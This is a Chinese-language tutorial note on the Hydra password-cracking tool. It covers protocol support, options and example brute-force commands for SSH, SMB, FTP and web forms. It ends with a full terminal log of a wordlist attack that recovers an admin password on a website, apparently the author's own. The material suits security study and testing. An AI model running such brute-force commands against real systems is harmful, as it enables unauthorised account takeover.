Hydra

  • 在线密码破解工具
  • 支持多种协议(身份认证)
    • 每种协议有不同的身份认证数据提交格式
    • 根据提交数据的返回信息判断认证是成功与否
    • adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
    • hydra -l [user] -p [pass] [service://server[:PORT][/OPT]]
      hydra -l user -p password ftp://1.1.1.1:2121
      hydra -L user.txt -P pass.txt smb://1.1.1.0/24
      hydra -l user -P pass.txt -M targets.txt ssh
      hydra -C cred.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      • -C : login:pass
      • hydra -U pop3s #查询模块可用选项
      • -R 继续之前未完成的破解任务( hydra.restore )
      • -I 重新开始扫描(忽略hydra.restqre )
      • -S 执行SSL连接( -0使用过时的SSLv2 /v3 )
      • -X MIN:MAX:CHARSET ( 小写a/大写A/数字1 )
        • -X 3:5:aA1 -X 5:5:/%,
      • -e nsr n空密码/ S用户名作密码/ r翻转的用户名做密码
      • -U 循环用户( 默认循环密码)
      • -o 结果输出到文件
      • -f/-F 成功退出(-f per host, -F global)
      • -t / -T 每主机并发连接数/全局并发连接数
      • -c 登录请求延时
      • -4/-6 IPv4 /v6
      • -v/-V 详细信息/每次登陆
    • 基于表单的web应用程序密码破解
    • hydra -1 admin -P pass.txt 192.168. 20.10 http-post-form "dwwa/login.php:username= ^USER^&password= ^PASS ^&Login=Login:S=index.php -t 1 -vV
    • F=login.php #S成功 F失败
    • C= /page/cookie:H=‘UA:firefox’ #指定cookie获取页面和http头
    • https-post form. http- get-form. https- get-form
    • hydra -U http-post form 查看模块参数

例子:表单爆破

hydra -l admin -P ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login" -vV

image-20221110154241916

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
    /usr/share/wordlists                                       14m 26s   root@kali  0.03   15:40:29  
❯ hydra -l admin -P ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login" -vV
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-10 15:40:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://www.c1moon.com:80/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target www.c1moon.com - login "admin" - pass "123456" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "password" - 2 of 10000 [child 1] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "12345678" - 3 of 10000 [child 2] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "qwerty" - 4 of 10000 [child 3] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "123456789" - 5 of 10000 [child 4] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "12345" - 6 of 10000 [child 5] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "1234" - 7 of 10000 [child 6] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "111111" - 8 of 10000 [child 7] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "1234567" - 9 of 10000 [child 8] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "dragon" - 10 of 10000 [child 9] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "123123" - 11 of 10000 [child 10] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "baseball" - 12 of 10000 [child 11] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "abc123" - 13 of 10000 [child 12] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "football" - 14 of 10000 [child 13] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "monkey" - 15 of 10000 [child 14] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "letmein" - 16 of 10000 [child 15] (0/0)
[80][http-post-form] host: www.c1moon.com   login: admin   password: 123456
[STATUS] attack finished for www.c1moon.com (valid pair found)
1 of 1 target successfully completed, 1 valid password found